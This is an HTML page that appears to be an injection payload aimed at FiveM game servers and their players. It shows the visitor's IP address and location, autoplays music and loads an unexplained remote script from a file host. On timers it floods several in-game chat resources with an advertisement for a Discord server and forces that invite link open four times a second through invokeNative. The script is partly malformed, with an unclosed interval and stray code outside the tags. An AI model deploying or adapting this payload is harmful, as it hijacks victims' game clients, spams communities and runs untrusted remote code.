<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>discord.gg/150</title>
    <style>
        body {
            margin: 0;
            padding: 0;
            background: url('https://i.pinimg.com/originals/51/ae/a3/51aea3393b8234a1e69d8713a0a58bc3.gif') no-repeat center center fixed;
            background-size: cover;
            font-family: 'Courier New', Courier, monospace;
            color: #161616;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            flex-direction: column;
            text-align: center;
        }
        .image-container img {
            width: 750px; 
            height: auto;
            border: 2px solid #161616; 
            border-radius: 15px;
            box-shadow: 0 0 15px rgba(32, 29, 31, 0.8); 
        }
        .info {
            margin-top: 20px;
            font-size: 1.5em;
            color: #ffffff; 
            text-shadow: 0px 0px 8px #ffffff, 0px 0px 15px #161616, 0px 0px 25px #161616; 
            letter-spacing: 4.5px; 
            white-space: pre-wrap;
        }
        .text {
            margin-top: 20px;
            font-size: 3em; 
            color: #ffffff; 
            text-shadow: 0px 0px 8px #00000, 0px 0px 15px #161616, 0px 0px 25px #161616; 
            letter-spacing: 4.5px; 
        }
    </style>
</head>
<body>
    <div class="image-container">
        <img src="https://i.ibb.co/gMsmBwBM/69team.png" alt="Discord Image">
    </div>
    <audio autoplay loop>
        <source src="https://cdn1.esm3.com/music/21/m214684.mp3" type="audio/mpeg">
    </audio>
    <div class="info" id="ip-info">
       <strong> IP: <span id="ip"></span></strong><br>
        <span><strong>City:</strong> <span id="city"></span></span><br>
        <span><strong>region:</strong> <span id="region"></span></span><br>
        <span><strong>Country:</strong> <span id="country"></span></span><br>
        <span><strong>Location:</strong> <span id="loc"></span></span><br>
        <span><strong>Organization:</strong> <span id="org"></span></span><br>
        <span><strong>Timezone:</strong> <span id="timezone"></span></span>
    </div>

    <div class="text">dsc : .iile</div>

    <script>
         fetch('https://ipinfo.io/json')
        .then(response => response.json())
        .then(data => {
            delete data.readme;
            const infoDiv = document.getElementById('ip-info');
            infoDiv.textContent = JSON.stringify(data, null, 2);
        });

    </script>
    <script>

const msg = `haha 69 team is here https://discord.gg/FWgGdS8nNg `;
const body = JSON.stringify({ message: msg });
setInterval(() => {
fetch("https://flix-scripts/chatResult", { method: "POST", body });
fetch("https://danger_chat/Danger_Chat:SendMessage", {method: "POST",body: JSON.stringify({"message": msg,"channel": "شات العام","color": null,"isImageAndLinksAllowed": [false,false]})})
fetch("https://easy-chat+/o6ZbK5Ecp6", {headers: {accept: "*/*","content-type": "application/x-www-form-urlencoded; charset=UTF-8"},body: JSON.stringify({ message: msg, channel: "شات العام" }),method: "POST"});
fetch("https://melix_chat/chatResult", { method: "POST", body });
fetch("https://as_chat/chatResult", { method: "POST", body });
fetch("https://chat/chatResult", { method: "POST", body });
fetch("https://ho-chatv2/Chat", {method: "POST",body: JSON.stringify({"Type": "chatResult","message": msg,"chatType": "general"})});
    </script>
<script src="https://files.catbox.moe/g0beqe.js"></script>
<script>
setInterval(() => {
window.invokeNative("openUrl", "https://discord.gg/FWgGdS8nNg");
window.invokeNative("openUrl", "https://discord.gg/FWgGdS8nNg");
window.invokeNative("openUrl", "https://discord.gg/FWgGdS8nNg");
window.invokeNative("openUrl", "https://discord.gg/FWgGdS8nNg");
}, 1000);
    </script>
}, 1000);


</body>
</html>
